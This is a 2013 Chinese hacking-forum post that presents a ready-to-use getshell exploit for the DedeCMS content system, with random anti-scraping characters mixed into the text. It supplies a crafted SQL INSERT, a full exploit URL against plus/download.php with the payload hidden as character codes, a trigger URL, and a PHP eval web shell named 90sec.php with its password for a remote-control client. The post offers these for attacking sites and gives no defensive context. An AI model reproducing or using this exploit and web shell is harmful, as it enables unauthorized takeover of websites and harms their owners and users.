中国网络渗透测试联盟
标题:
dedecms漏洞getshell EXP最新
[打印本页]
作者:
admin
时间:
2013-6-10 16:49
标题:
dedecms漏洞getshell EXP最新
本帖最后由 土豆 于 2013-6-10 14:41 编辑
: v0 u! ]' a# ]% I/ X9 X
' H+ p3 A8 A+ Y: M, ^# F
! u# M. ?, V, [/ x$ \0 Y; N
作者:鬼哥
1 P' x7 |, q& \8 h
/ R- N) J C- t8 E4 N
看贴不回,没JJ
3 g ~: H% ^/ h' D+ }+ \
2 e% T) R/ {" ?% r8 |& y& k- u
漏洞大家都知道是哪个。
/ {( Z: B2 f# R6 y- \
: F) S: j: D1 c. r
其实我一直在玩。。郁闷 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。
0 q. W6 w, V# _
/ C) d5 l2 U" l; h2 M9 n4 V
但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。
% P1 ~6 U$ f4 o
8 r4 X! D1 V- p* F5 |( U; A
刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?
8 I$ J [) h; n' }" U! a
2 d% ]. `' u& x6 H' n0 A, O
getshell 很容易 。 既然刚发出来的是 sql方法getshell 我也看到几个人发了sql增加表mytag的内容。
" O% A' u3 m* m; ~; G
$ u' u, a% L* b$ X
但是测试了下。。失败
; i9 {( F/ J- ?+ l0 b
% g/ h7 g6 }' n" }! W1 Y
原因: 用的语句是update 很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴 错误。。现在要做的饶过即可。以前也出过那么多dede sql 结合饶过,成功INSERT。
( i6 f7 D; X/ ` y5 w2 Z V7 M; P
6 q8 G4 b1 [% \! T6 }
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'`
8 y% E% W3 X- w% Q
0 [9 }1 k3 r6 O# Z. Q" B
EXP:
s, P- Z( l3 R
5 _% y8 _4 e% e9 G5 e: f' F0 l
http://www.xxx.com/plus/download.php?open=1&arrs1
[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96
, @" O4 l0 W. c5 z+ z8 G9 \
7 ~# s+ d( v2 v% k
. V* k& x; h9 {
成功增加。
) h0 |# j. Z( V; b1 X
$ Q$ _( B5 H/ A* f+ ?. i! n9 }
访问
http://www.xxx.com/plus/mytag_js.php?aid=9013
, w% L0 j. A3 y s7 m
生成一句话木马.
7 p1 `' E% D2 y, i# y' s
菜刀连接
http://www.xxx.com/plus/90sec.php
密码 guige
% }& O, b2 o8 ^2 J, k
) }/ z7 J1 R# c$ |) R( D1 R
测试OK。
2 y" X, {; A2 j& m7 c4 ~
3 {+ n, X+ |0 _; V) \. f
) q- ?1 ]1 ~: J; Y- j
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2